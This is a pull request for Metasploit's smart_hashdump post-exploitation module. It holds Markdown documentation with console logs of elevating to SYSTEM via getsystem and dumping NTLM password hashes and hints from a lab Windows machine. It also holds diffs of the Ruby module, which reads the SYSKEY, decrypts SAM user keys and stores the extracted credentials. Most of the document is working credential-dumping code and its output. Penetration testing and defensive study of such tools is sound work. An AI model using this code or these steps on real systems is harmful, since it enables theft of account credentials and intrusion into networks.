### PR TITLE
Bugfix: Don't skip dumping RID 1001's hash with smart_hashdump

### DIFF
--- a/documentation/modules/post/windows/gather/smart_hashdump.md
+++ b/documentation/modules/post/windows/gather/smart_hashdump.md
@@ -1,0 +1,107 @@
+The post/windows/gather/smart_hashdump module dumps local accounts from the SAM database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.
+
+Hashes will be saved to the meterpreter database in John the Ripper format for later use.
+
+## Vulnerable Application
+
+To be able to use post/windows/gather/smart_hashdump, you must meet these requirements:
+
+* You are on a Meterpreter type session.
+* The target is a Windows platform.
+* It must be executed under the context of a high privilege account, such as SYSTEM.
+
+## Verification Steps
+
+1. Obtain a meterpreter shell on a Windows system, running as a highly privileged or SYSTEM user.
+1. Load the module, `use post/windows/gather/smart_hashdump`
+1. Specify the session, eg: `set SESSION 1`
+1. If necessary, tell the module to attempt to elevate to SYSTEM first: `set GETSYSTEM true`
+1. Run the module.
+
+For example:
+```
+msf6 exploit(multi/handler) > use post/windows/gather/smart_hashdump
+msf6 post(windows/gather/smart_hashdump) > show options
+
+Module options (post/windows/gather/smart_hashdump):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   GETSYSTEM  false            no        Attempt to get SYSTEM privilege on the target host.
+   SESSION                     yes       The session to run this module on.
+
+msf6 post(windows/gather/smart_hashdump) > set  SESSION 1
+SESSION => 1
+msf6 post(windows/gather/smart_hashdump) > run
+
+[*] Running module against DESKTOP-G7A2R2R
+[*] Hashes will be saved to the database if one is connected.
+[+] Hashes will be saved in loot in JtR password file format to:
+[*] /home/kali/.msf4/loot/20201008121933_default_192.168.56.117_windows.hashes_338495.txt
+[-] Insufficient privileges to dump hashes!
+[*] Post module execution completed
+msf6 post(windows/gather/smart_hashdump) > set GETSYSTEM true
+GETSYSTEM => true
+msf6 post(windows/gather/smart_hashdump) > run
+
+[*] Running module against DESKTOP-G7A2R2R
+[*] Hashes will be saved to the database if one is connected.
+[+] Hashes will be saved in loot in JtR password file format to:
+[*] /home/kali/.msf4/loot/20201008122008_default_192.168.56.117_windows.hashes_353942.txt
+[*] Dumping password hashes...
+[*] Trying to get SYSTEM privilege
+[+] Got SYSTEM privilege
+[*]     Obtaining the boot key...
+[*]     Calculating the hboot key using SYSKEY 4934844cf0365459683ed18d9ebcb903...
+[*]     Obtaining the user list and keys...
+[*]     Decrypting user keys...
+[*]     Dumping password hints...
+[*]     No users with password hints on this system
+[*]     Dumping password hashes...
+[+]     Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+[+]     DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+[+]     WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+[+]     user:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+[*] Post module execution completed
+```
+
+
+## Scenarios
+
+**High Privilege Account**
+
+Before using post/windows/gather/smart_hashdump, there is a possibility you need to escalate your privileges. This module features a `GETSYSTEM` option, which will attempt to elevate from a high privileged account to NT AUTHORITY\SYSTEM.
+
+```
+msf6 post(windows/gather/smart_hashdump) > set GETSYSTEM true
+GETSYSTEM => true
+```
+
+Note that this will invoke Meterpreter's standard GetSystem feature prior to running the module, and it will affect the entire session. To demonstrate, a Meterpreter shell running as an administrator account:
+```
+  Session ID: 1
+        Name:
+        Type: meterpreter windows
+        Info: DESKTOP-G7A2R2R\user @ DESKTOP-G7A2R2R
+      Tunnel: 192.168.56.118:4444 -> 192.168.56.117:49680 (192.168.56.117)
+         Via: exploit/multi/handler
+   Encrypted: Yes (AES-256-CBC)
+        UUID: bd2a0bae4a53009e/x86=1/windows=1/2020-10-08T03:42:16Z
+     CheckIn: 4s ago @ 2020-10-08 12:52:17 +0900
+  Registered: No
+```
+
+After invoking the `post/windows/gather/smart_hashdump` on the session with `GETSYSTEM` set to `true` will look like (see the example in Verification Steps):
+```
+  Session ID: 1
+        Name:
+        Type: meterpreter windows
+        Info: NT AUTHORITY\SYSTEM @ DESKTOP-G7A2R2R
+      Tunnel: 192.168.56.118:4444 -> 192.168.56.117:49680 (192.168.56.117)
+         Via: exploit/multi/handler
+   Encrypted: Yes (AES-256-CBC)
+        UUID: bd2a0bae4a53009e/x86=1/windows=1/2020-10-08T03:42:16Z
+     CheckIn: 0s ago @ 2020-10-08 12:55:12 +0900
+  Registered: No
+
+```

--- a/documentation/modules/post/windows/gather/smart_hashdump.md
+++ b/documentation/modules/post/windows/gather/smart_hashdump.md
@@ -1,8 +1,9 @@
-The post/windows/gather/smart_hashdump module dumps local accounts from the SAM database. If the target host is a Domain Controller, it will dump the Domain Account Database using the proper technique depending on privilege level, OS and role of the host.
-
-Hashes will be saved to the meterpreter database in John the Ripper format for later use.
-
 ## Vulnerable Application
+The post/windows/gather/smart_hashdump module dumps local accounts from the SAM database. If the target host
+is a Domain Controller, it will dump the Domain Account Database using the proper technique depending
+on privilege level, OS and role of the host.
+
+Hashes will be saved to the Metasploit database in John the Ripper format for later use.
 
 To be able to use post/windows/gather/smart_hashdump, you must meet these requirements:
 
@@ -12,13 +13,30 @@ To be able to use post/windows/gather/smart_hashdump, you must meet these requir
 
 ## Verification Steps
 
-1. Obtain a meterpreter shell on a Windows system, running as a highly privileged or SYSTEM user.
-1. Load the module, `use post/windows/gather/smart_hashdump`
+1. Obtain a meterpreter shell on a Windows system, and ensure that you have SYSTEM privileges
+   or are running as a highly privileged user.
+1. `use post/windows/gather/smart_hashdump`
 1. Specify the session, eg: `set SESSION 1`
-1. If necessary, tell the module to attempt to elevate to SYSTEM first: `set GETSYSTEM true`
+1. If necessary, tell the module to attempt to elevate to SYSTEM before
+   attempting to dump the credentials with the command: `set GETSYSTEM true`.
 1. Run the module.
 
-For example:
+## Options
+
+### GETSYSTEM
+Attempt to run the `getsystem` module on the target host to get `NT AUTHORITY\SYSTEM` privileges prior to dumping the hashes.
+
+## Scenarios
+
+**High Privilege Account on Windows 10 x64 v2004**
+
+Before using post/windows/gather/smart_hashdump, there is a possibility you need to escalate your privileges.
+This module features a `GETSYSTEM` option, which will attempt to elevate from a high privileged account to `NT AUTHORITY\SYSTEM`.
+This can be seen in the following example which is running as a high privileged user in which the module
+fails to run successfully as the current user is not `NT AUTHORITY\SYSTEM`. By using the `GETSYSTEM` option, the user is able
+to elevate themselves to `NT AUTHORITY\SYSTEM` using Metasploit's `getsystem` module, after which they are then able
+to dump the password hashes.
+
 ```
 msf6 exploit(multi/handler) > use post/windows/gather/smart_hashdump
 msf6 post(windows/gather/smart_hashdump) > show options
@@ -30,7 +48,7 @@ Module options (post/windows/gather/smart_hashdump):
    GETSYSTEM  false            no        Attempt to get SYSTEM privilege on the target host.
    SESSION                     yes       The session to run this module on.
 
-msf6 post(windows/gather/smart_hashdump) > set  SESSION 1
+msf6 post(windows/gather/smart_hashdump) > set SESSION 1
 SESSION => 1
 msf6 post(windows/gather/smart_hashdump) > run
 
@@ -65,43 +83,57 @@ msf6 post(windows/gather/smart_hashdump) > run
 [*] Post module execution completed
 ```
 
-
-## Scenarios
-
-**High Privilege Account**
-
-Before using post/windows/gather/smart_hashdump, there is a possibility you need to escalate your privileges. This module features a `GETSYSTEM` option, which will attempt to elevate from a high privileged account to NT AUTHORITY\SYSTEM.
-
+**Running as the SYSTEM user on Windows 7 x64 SP1**
 ```
-msf6 post(windows/gather/smart_hashdump) > set GETSYSTEM true
-GETSYSTEM => true
-```
+msf6 exploit(multi/handler) > exploit
 
-Note that this will invoke Meterpreter's standard GetSystem feature prior to running the module, and it will affect the entire session. To demonstrate, a Meterpreter shell running as an administrator account:
-```
-  Session ID: 1
-        Name:
-        Type: meterpreter windows
-        Info: DESKTOP-G7A2R2R\user @ DESKTOP-G7A2R2R
-      Tunnel: 192.168.56.118:4444 -> 192.168.56.117:49680 (192.168.56.117)
-         Via: exploit/multi/handler
-   Encrypted: Yes (AES-256-CBC)
-        UUID: bd2a0bae4a53009e/x86=1/windows=1/2020-10-08T03:42:16Z
-     CheckIn: 4s ago @ 2020-10-08 12:52:17 +0900
-  Registered: No
-```
+[*] Started bind TCP handler against 172.24.15.185:4444
+[*] Sending stage (200262 bytes) to 172.24.15.185
+[*] Meterpreter session 1 opened (0.0.0.0:0 -> 172.24.15.185:4444) at 2020-10-08 12:46:47 -0500
 
-After invoking the `post/windows/gather/smart_hashdump` on the session with `GETSYSTEM` set to `true` will look like (see the example in Verification Steps):
-```
-  Session ID: 1
-        Name:
-        Type: meterpreter windows
-        Info: NT AUTHORITY\SYSTEM @ DESKTOP-G7A2R2R
-      Tunnel: 192.168.56.118:4444 -> 192.168.56.117:49680 (192.168.56.117)
-         Via: exploit/multi/handler
-   Encrypted: Yes (AES-256-CBC)
-        UUID: bd2a0bae4a53009e/x86=1/windows=1/2020-10-08T03:42:16Z
-     CheckIn: 0s ago @ 2020-10-08 12:55:12 +0900
-  Registered: No
+meterpreter > getuid
+Server username: test-PC\test
+meterpreter > getsystem
+...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 exploit(multi/handler) > use post/windows/gather/smart_hashdump
+msf6 post(windows/gather/smart_hashdump) > sessions -i 1
+[*] Starting interaction with 1...
 
+meterpreter > sysinfo
+Computer        : TEST-PC
+OS              : Windows 7 (6.1 Build 7601, Service Pack 1).
+Architecture    : x64
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x64/windows
+meterpreter > background
+[*] Backgrounding session 1...
+msf6 post(windows/gather/smart_hashdump) > set SESSION 1
+SESSION => 1
+msf6 post(windows/gather/smart_hashdump) > run
+
+[*] Running module against TEST-PC
+[*] Hashes will be saved to the database if one is connected.
+[+] Hashes will be saved in loot in JtR password file format to:
+[*] /home/gwillcox/.msf4/loot/20201008124735_default_172.24.15.185_windows.hashes_456389.txt
+[*] Dumping password hashes...
+[*] Running as SYSTEM extracting hashes from registry
+[*] 	Obtaining the boot key...
+[*] 	Calculating the hboot key using SYSKEY 8e9f8fa11359f037112782911694d611...
+[*] 	Obtaining the user list and keys...
+[*] 	Decrypting user keys...
+[*] 	Dumping password hints...
+[+] 	test:"a"
+[+] 	test2:"asdf"
+[*] 	Dumping password hashes...
+[+] 	Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
+[+] 	test:1000:aad3b435b51404eeaad3b435b51404ee:0cb6948805f797bf2a82807973b89537:::
+[+] 	test2:1001:aad3b435b51404eeaad3b435b51404ee:0e8231621f574d3636255ff36dd86c9c:::
+[*] Post module execution completed
+msf6 post(windows/gather/smart_hashdump) >
 ```

--- a/modules/post/windows/gather/smart_hashdump.rb
+++ b/modules/post/windows/gather/smart_hashdump.rb
@@ -216,7 +216,6 @@ class MetasploitModule < Msf::Post
 
   def read_hashdump
     host = session.session_host
-    port = session.session_port
     collected_hashes = ''
     tries = 1
 
@@ -283,7 +282,7 @@ class MetasploitModule < Msf::Post
 
         # Merge in the service data and create our Login
         login_data.merge!(service_data)
-        login = create_credential_login(login_data)
+        create_credential_login(login_data)
       end
     rescue ::Interrupt
       raise $ERROR_INFO
@@ -310,7 +309,6 @@ class MetasploitModule < Msf::Post
   def inject_hashdump
     collected_hashes = ''
     host = session.session_host
-    port = session.session_port
     # Load priv extension
     session.core.use('priv')
     # dump hashes
@@ -366,7 +364,7 @@ class MetasploitModule < Msf::Post
 
         # Merge in the service data and create our Login
         login_data.merge!(service_data)
-        login = create_credential_login(login_data)
+        create_credential_login(login_data)
       rescue StandardError
         next
       end

--- a/modules/post/windows/gather/smart_hashdump.rb
+++ b/modules/post/windows/gather/smart_hashdump.rb
@@ -415,13 +415,13 @@ class MetasploitModule < Msf::Post
   #-------------------------------------------------------------------------------
 
   def smart_hash_dump(migrate_system, pwdfile)
-    domain_controler = is_dc?
+    domain_controller = is_dc?
     if !is_uac_enabled? || is_admin?
       print_status('Dumping password hashes...')
       # Check if Running as SYSTEM
       if is_system?
         # For DC's the registry read method does not work.
-        if domain_controler
+        if domain_controller
           begin
             file_local_write(pwdfile, inject_hashdump)
           rescue ::Exception => e
@@ -445,7 +445,7 @@ class MetasploitModule < Msf::Post
       else
 
         # Check if Domain Controller
-        if domain_controler
+        if domain_controller
           begin
             file_local_write(pwdfile, inject_hashdump)
           rescue StandardError

--- a/modules/post/windows/gather/smart_hashdump.rb
+++ b/modules/post/windows/gather/smart_hashdump.rb
@@ -12,42 +12,46 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Accounts
   include Msf::Auxiliary::Report
 
-  def initialize(info={})
-    super( update_info( info,
-        'Name'          => 'Windows Gather Local and Domain Controller Account Password Hashes',
-        'Description'   => %q{
-            This will dump local accounts from the SAM Database. If the target
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Windows Gather Local and Domain Controller Account Password Hashes',
+        'Description' => %q{
+          This will dump local accounts from the SAM Database. If the target
           host is a Domain Controller, it will dump the Domain Account Database using the proper
           technique depending on privilege level, OS and role of the host.
         },
-        'License'       => MSF_LICENSE,
-        'Author'        => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
-        'Platform'      => [ 'win' ],
-        'SessionTypes'  => [ 'meterpreter' ]
-      ))
+        'License' => MSF_LICENSE,
+        'Author' => [ 'Carlos Perez <carlos_perez[at]darkoperator.com>'],
+        'Platform' => [ 'win' ],
+        'SessionTypes' => [ 'meterpreter' ]
+      )
+    )
     register_options(
       [
         OptBool.new('GETSYSTEM', [ false, 'Attempt to get SYSTEM privilege on the target host.', false])
 
-      ])
+      ]
+    )
     @smb_port = 445
     # Constants for SAM decryption
-    @sam_lmpass   = "LMPASSWORD\x00"
-    @sam_ntpass   = "NTPASSWORD\x00"
-    @sam_qwerty   = "!@\#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\x00"
-    @sam_numeric  = "0123456789012345678901234567890123456789\x00"
-    @sam_empty_lm = ["aad3b435b51404eeaad3b435b51404ee"].pack("H*")
-    @sam_empty_nt = ["31d6cfe0d16ae931b73c59d7e0c089c0"].pack("H*")
+    @sam_lmpass = "LMPASSWORD\x00"
+    @sam_ntpass = "NTPASSWORD\x00"
+    @sam_qwerty = "!@\#$%^&*()qwertyUIOPAzxcvbnmQQQQQQQQQQQQ)(*@&%\x00"
+    @sam_numeric = "0123456789012345678901234567890123456789\x00"
+    @sam_empty_lm = ['aad3b435b51404eeaad3b435b51404ee'].pack('H*')
+    @sam_empty_nt = ['31d6cfe0d16ae931b73c59d7e0c089c0'].pack('H*')
 
   end
 
   # Run Method for when run command is issued
   def run
     print_status("Running module against #{sysinfo['Computer']}")
-    host = Rex::FileUtils.clean_path(sysinfo["Computer"])
-    hash_file = store_loot("windows.hashes", "text/plain", session, "", "#{host}_hashes.txt", "Windows Hashes")
-    print_status("Hashes will be saved to the database if one is connected.")
-    print_good("Hashes will be saved in loot in JtR password file format to:")
+    host = Rex::FileUtils.clean_path(sysinfo['Computer'])
+    hash_file = store_loot('windows.hashes', 'text/plain', session, '', "#{host}_hashes.txt", 'Windows Hashes')
+    print_status('Hashes will be saved to the database if one is connected.')
+    print_good('Hashes will be saved in loot in JtR password file format to:')
     print_status(hash_file)
     smart_hash_dump(datastore['GETSYSTEM'], hash_file)
   end
@@ -55,19 +59,21 @@ class MetasploitModule < Msf::Post
   #-------------------------------------------------------------------------------
 
   def capture_hboot_key(bootkey)
-    ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account", KEY_READ)
-    return if not ok
-    vf = ok.query_value("F")
-    return if not vf
+    ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SAM\\SAM\\Domains\\Account', KEY_READ)
+    return if !ok
+
+    vf = ok.query_value('F')
+    return if !vf
+
     vf = vf.data
     ok.close
 
     hash = Digest::MD5.new
     hash.update(vf[0x70, 16] + @sam_qwerty + bootkey + @sam_numeric)
 
-    rc4 = OpenSSL::Cipher.new("rc4")
+    rc4 = OpenSSL::Cipher.new('rc4')
     rc4.key = hash.digest
-    hbootkey  = rc4.update(vf[0x80, 32])
+    hbootkey = rc4.update(vf[0x80, 32])
     hbootkey << rc4.final
     return hbootkey
   end
@@ -75,19 +81,20 @@ class MetasploitModule < Msf::Post
 
   def capture_user_keys
     users = {}
-    ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users", KEY_READ)
-    return if not ok
+    ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SAM\\SAM\\Domains\\Account\\Users', KEY_READ)
+    return if !ok
 
     ok.enum_key.each do |usr|
       uk = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\#{usr}", KEY_READ)
       next if usr == 'Names'
-      users[usr.to_i(16)] ||={}
-      users[usr.to_i(16)][:F] = uk.query_value("F").data
-      users[usr.to_i(16)][:V] = uk.query_value("V").data
 
-      #Attempt to get Hints (from Win7/Win8 Location)
+      users[usr.to_i(16)] ||= {}
+      users[usr.to_i(16)][:F] = uk.query_value('F').data
+      users[usr.to_i(16)][:V] = uk.query_value('V').data
+
+      # Attempt to get Hints (from Win7/Win8 Location)
       begin
-        users[usr.to_i(16)][:UserPasswordHint] = uk.query_value("UserPasswordHint").data
+        users[usr.to_i(16)][:UserPasswordHint] = uk.query_value('UserPasswordHint').data
       rescue ::Rex::Post::Meterpreter::RequestError
         users[usr.to_i(16)][:UserPasswordHint] = nil
       end
@@ -96,19 +103,19 @@ class MetasploitModule < Msf::Post
     end
     ok.close
 
-    ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\Names", KEY_READ)
+    ok = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, 'SAM\\SAM\\Domains\\Account\\Users\\Names', KEY_READ)
     ok.enum_key.each do |usr|
       uk = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SAM\\SAM\\Domains\\Account\\Users\\Names\\#{usr}", KEY_READ)
-      r = uk.query_value("")
+      r = uk.query_value('')
       rid = r.type
       users[rid] ||= {}
       users[rid][:Name] = usr
 
-      #Attempt to get Hints (from WinXP Location) only if it's not set yet
+      # Attempt to get Hints (from WinXP Location) only if it's not set yet
       if users[rid][:UserPasswordHint].nil?
         begin
           uk_hint = session.sys.registry.open_key(HKEY_LOCAL_MACHINE, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Hints\\#{usr}", KEY_READ)
-          users[rid][:UserPasswordHint] = uk_hint.query_value("").data
+          users[rid][:UserPasswordHint] = uk_hint.query_value('').data
         rescue ::Rex::Post::Meterpreter::RequestError
           users[rid][:UserPasswordHint] = nil
         end
@@ -125,16 +132,16 @@ class MetasploitModule < Msf::Post
     users.each_key do |rid|
       user = users[rid]
 
-      hashlm_enc = ""
-      hashnt_enc = ""
+      hashlm_enc = ''
+      hashnt_enc = ''
 
-      hoff = user[:V][0x9c, 4].unpack("V")[0] + 0xcc
+      hoff = user[:V][0x9c, 4].unpack1('V') + 0xcc
 
-      #Check if hashes exist (if 20, then we've got a hash)
-      lm_exists = user[:V][0x9c+4,4].unpack("V")[0] == 20 ? true : false
-      nt_exists = user[:V][0x9c+16,4].unpack("V")[0] == 20 ? true : false
+      # Check if hashes exist (if 20, then we've got a hash)
+      lm_exists = user[:V][0x9c + 4, 4].unpack1('V') == 20
+      nt_exists = user[:V][0x9c + 16, 4].unpack1('V') == 20
 
-      #If we have a hashes, then parse them (Note: NT is dependant on LM)
+      # If we have a hashes, then parse them (Note: NT is dependant on LM)
       hashlm_enc = user[:V][hoff + 4, 16] if lm_exists
       hashnt_enc = user[:V][(hoff + (lm_exists ? 24 : 8)), 16] if nt_exists
 
@@ -147,7 +154,7 @@ class MetasploitModule < Msf::Post
   #-------------------------------------------------------------------------------
 
   def decode_windows_hint(e_string)
-    d_string = ""
+    d_string = ''
     e_string.scan(/..../).each do |chunk|
       bytes = chunk.scan(/../)
       d_string += (bytes[1] + bytes[0]).to_s.hex.chr
@@ -158,12 +165,12 @@ class MetasploitModule < Msf::Post
 
   def rid_to_key(rid)
 
-    s1 = [rid].pack("V")
-    s1 << s1[0,3]
+    s1 = [rid].pack('V')
+    s1 << s1[0, 3]
 
-    s2b = [rid].pack("V").unpack("C4")
-    s2 = [s2b[3], s2b[0], s2b[1], s2b[2]].pack("C4")
-    s2 << s2[0,3]
+    s2b = [rid].pack('V').unpack('C4')
+    s2 = [s2b[3], s2b[0], s2b[1], s2b[2]].pack('C4')
+    s2 << s2[0, 3]
 
     [convert_des_56_to_64(s1), convert_des_56_to_64(s2)]
   end
@@ -171,14 +178,14 @@ class MetasploitModule < Msf::Post
 
   def decrypt_user_hash(rid, hbootkey, enchash, pass)
 
-    if(enchash.empty?)
+    if enchash.empty?
       case pass
       when @sam_lmpass
         return @sam_empty_lm
       when @sam_ntpass
         return @sam_empty_nt
       end
-      return ""
+      return ''
     end
 
     des_k1, des_k2 = rid_to_key(rid)
@@ -192,45 +199,45 @@ class MetasploitModule < Msf::Post
     d2.key = des_k2
 
     md5 = Digest::MD5.new
-    md5.update(hbootkey[0,16] + [rid].pack("V") + pass)
+    md5.update(hbootkey[0, 16] + [rid].pack('V') + pass)
 
     rc4 = OpenSSL::Cipher.new('rc4')
     rc4.key = md5.digest
     okey = rc4.update(enchash)
 
-    d1o  = d1.decrypt.update(okey[0,8])
+    d1o = d1.decrypt.update(okey[0, 8])
     d1o << d1.final
 
-    d2o  = d2.decrypt.update(okey[8,8])
+    d2o = d2.decrypt.update(okey[8, 8])
     d1o << d2.final
     d1o + d2o
   end
   #-------------------------------------------------------------------------------
 
   def read_hashdump
-    host,port = session.session_host, session.session_port
-    collected_hashes = ""
+    host = session.session_host
+    port = session.session_port
+    collected_hashes = ''
     tries = 1
 
     begin
-
       print_status("\tObtaining the boot key...")
-      bootkey  = capture_boot_key
+      bootkey = capture_boot_key
 
-      print_status("\tCalculating the hboot key using SYSKEY #{bootkey.unpack("H*")[0]}...")
+      print_status("\tCalculating the hboot key using SYSKEY #{bootkey.unpack1('H*')}...")
       hbootkey = capture_hboot_key(bootkey)
 
       print_status("\tObtaining the user list and keys...")
-      users    = capture_user_keys
+      users = capture_user_keys
 
       print_status("\tDecrypting user keys...")
-      users    = decrypt_user_keys(hbootkey, users)
+      users = decrypt_user_keys(hbootkey, users)
 
       print_status("\tDumping password hints...")
       hint_count = 0
-      users.keys.sort{|a,b| a<=>b}.each do |rid|
-        #If we have a hint then print it
-        if !users[rid][:UserPasswordHint].nil? && users[rid][:UserPasswordHint].length > 0
+      users.keys.sort { |a, b| a <=> b }.each do |rid|
+        # If we have a hint then print it
+        if !users[rid][:UserPasswordHint].nil? && !users[rid][:UserPasswordHint].empty?
           print_good("\t#{users[rid][:Name]}:\"#{users[rid][:UserPasswordHint]}\"")
           hint_count += 1
         end
@@ -238,28 +245,29 @@ class MetasploitModule < Msf::Post
       print_status("\tNo users with password hints on this system") if hint_count == 0
 
       print_status("\tDumping password hashes...")
-      users.keys.sort{|a,b| a<=>b}.each do |rid|
+      users.keys.sort { |a, b| a <=> b }.each do |rid|
         # next if guest account
         next if rid == 501
-        collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::\n"
 
-        print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack("H*")[0]}:#{users[rid][:hashnt].unpack("H*")[0]}:::")
+        collected_hashes << "#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack1('H*')}:#{users[rid][:hashnt].unpack1('H*')}:::\n"
+
+        print_good("\t#{users[rid][:Name]}:#{rid}:#{users[rid][:hashlm].unpack1('H*')}:#{users[rid][:hashnt].unpack1('H*')}:::")
 
         service_data = {
-            address: host,
-            port: @smb_port,
-            service_name: 'smb',
-            protocol: 'tcp',
-            workspace_id: myworkspace_id
+          address: host,
+          port: @smb_port,
+          service_name: 'smb',
+          protocol: 'tcp',
+          workspace_id: myworkspace_id
         }
 
         credential_data = {
-            origin_type: :session,
-            session_id: session_db_id,
-            post_reference_name: self.refname,
-            private_type: :ntlm_hash,
-            private_data: users[rid][:hashlm].unpack("H*")[0] +":"+ users[rid][:hashnt].unpack("H*")[0],
-            username: users[rid][:Name]
+          origin_type: :session,
+          session_id: session_db_id,
+          post_reference_name: refname,
+          private_type: :ntlm_hash,
+          private_data: users[rid][:hashlm].unpack1('H*') + ':' + users[rid][:hashnt].unpack1('H*'),
+          username: users[rid][:Name]
         }
 
         credential_data.merge!(service_data)
@@ -268,32 +276,30 @@ class MetasploitModule < Msf::Post
         credential_core = create_credential(credential_data)
 
         # Assemble the options hash for creating the Metasploit::Credential::Login object
-        login_data ={
-            core: credential_core,
-            status: Metasploit::Model::Login::Status::UNTRIED
+        login_data = {
+          core: credential_core,
+          status: Metasploit::Model::Login::Status::UNTRIED
         }
 
         # Merge in the service data and create our Login
         login_data.merge!(service_data)
         login = create_credential_login(login_data)
       end
-
     rescue ::Interrupt
-      raise $!
+      raise $ERROR_INFO
     rescue ::Rex::Post::Meterpreter::RequestError => e
       # Sometimes we get this invalid handle race condition.
       # So let's retry a couple of times before giving up.
       # See bug #6815
-      if tries < 5 and e.to_s =~ /The handle is invalid/
-        print_status("Handle is invalid, retrying...")
+      if (tries < 5) && e.to_s =~ /The handle is invalid/
+        print_status('Handle is invalid, retrying...')
         tries += 1
         retry
 
       else
         print_error("Meterpreter Exception: #{e.class} #{e}")
-        print_error("This script requires the use of a SYSTEM user context (hint: migrate into service process)")
+        print_error('This script requires the use of a SYSTEM user context (hint: migrate into service process)')
       end
-
     rescue ::Exception => e
       print_error("Error: #{e.class} #{e} #{e.backtrace}")
     end
@@ -302,46 +308,49 @@ class MetasploitModule < Msf::Post
   #-------------------------------------------------------------------------------
 
   def inject_hashdump
-    collected_hashes = ""
-    host,port = session.session_host, session.session_port
+    collected_hashes = ''
+    host = session.session_host
+    port = session.session_port
     # Load priv extension
-    session.core.use("priv")
+    session.core.use('priv')
     # dump hashes
     session.priv.sam_hashes.each do |h|
-      returned_hash = h.to_s.split(":")
-      if returned_hash[1] == "j"
+      returned_hash = h.to_s.split(':')
+      if returned_hash[1] == 'j'
         returned_hash.delete_at(1)
       end
-      rid =  returned_hash[1].to_i
+      rid = returned_hash[1].to_i
 
       # Skip the Guest Account
       next if rid == 501
 
       # skip if it returns nil for an entry
-      next if h == nil
+      next if h.nil?
+
       begin
-        user = returned_hash[0].scan(/^[a-zA-Z0-9_\-$.]*/).join.gsub(/\.$/,"")
+        user = returned_hash[0].scan(/^[a-zA-Z0-9_\-$.]*/).join.gsub(/\.$/, '')
         lmhash = returned_hash[2].scan(/[a-f0-9]*/).join
-        next if lmhash == nil
+        next if lmhash.nil?
+
         hash_entry = "#{user}:#{rid}:#{lmhash}:#{returned_hash[3]}"
         collected_hashes << "#{hash_entry}\n"
         print_good("\t#{hash_entry}")
 
         service_data = {
-            address: host,
-            port: @smb_port,
-            service_name: 'smb',
-            protocol: 'tcp',
-            workspace_id: myworkspace_id
+          address: host,
+          port: @smb_port,
+          service_name: 'smb',
+          protocol: 'tcp',
+          workspace_id: myworkspace_id
         }
 
         credential_data = {
-            origin_type: :session,
-            session_id: session_db_id,
-            post_reference_name: self.refname,
-            private_type: :ntlm_hash,
-            private_data: "#{lmhash}:#{returned_hash[3]}",
-            username: user
+          origin_type: :session,
+          session_id: session_db_id,
+          post_reference_name: refname,
+          private_type: :ntlm_hash,
+          private_data: "#{lmhash}:#{returned_hash[3]}",
+          username: user
         }
 
         credential_data.merge!(service_data)
@@ -350,15 +359,15 @@ class MetasploitModule < Msf::Post
         credential_core = create_credential(credential_data)
 
         # Assemble the options hash for creating the Metasploit::Credential::Login object
-        login_data ={
-            core: credential_core,
-            status: Metasploit::Model::Login::Status::UNTRIED
+        login_data = {
+          core: credential_core,
+          status: Metasploit::Model::Login::Status::UNTRIED
         }
 
         # Merge in the service data and create our Login
         login_data.merge!(service_data)
         login = create_credential_login(login_data)
-      rescue
+      rescue StandardError
         next
       end
     end
@@ -369,9 +378,9 @@ class MetasploitModule < Msf::Post
   # Function for checking if target is a DC
   def is_dc?
     is_dc_srv = false
-    serviceskey = "HKLM\\SYSTEM\\CurrentControlSet\\Services"
-    if registry_enumkeys(serviceskey).include?("NTDS")
-      if registry_enumkeys(serviceskey + "\\NTDS").include?("Parameters")
+    serviceskey = 'HKLM\\SYSTEM\\CurrentControlSet\\Services'
+    if registry_enumkeys(serviceskey).include?('NTDS')
+      if registry_enumkeys(serviceskey + '\\NTDS').include?('Parameters')
         print_good("\tThis host is a Domain Controller!")
         is_dc_srv = true
       end
@@ -383,26 +392,25 @@ class MetasploitModule < Msf::Post
   # Function to migrate to a process running as SYSTEM
   def move_to_sys
     # Make sure you got the correct SYSTEM Account Name no matter the OS Language
-    local_sys = resolve_sid("S-1-5-18")
+    local_sys = resolve_sid('S-1-5-18')
     system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}"
 
     # Processes that can Blue Screen a host if migrated in to
-    dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"]
+    dangerous_processes = ['lsass.exe', 'csrss.exe', 'smss.exe']
 
-    print_status("Migrating to process owned by SYSTEM")
+    print_status('Migrating to process owned by SYSTEM')
     session.sys.process.processes.each do |p|
-
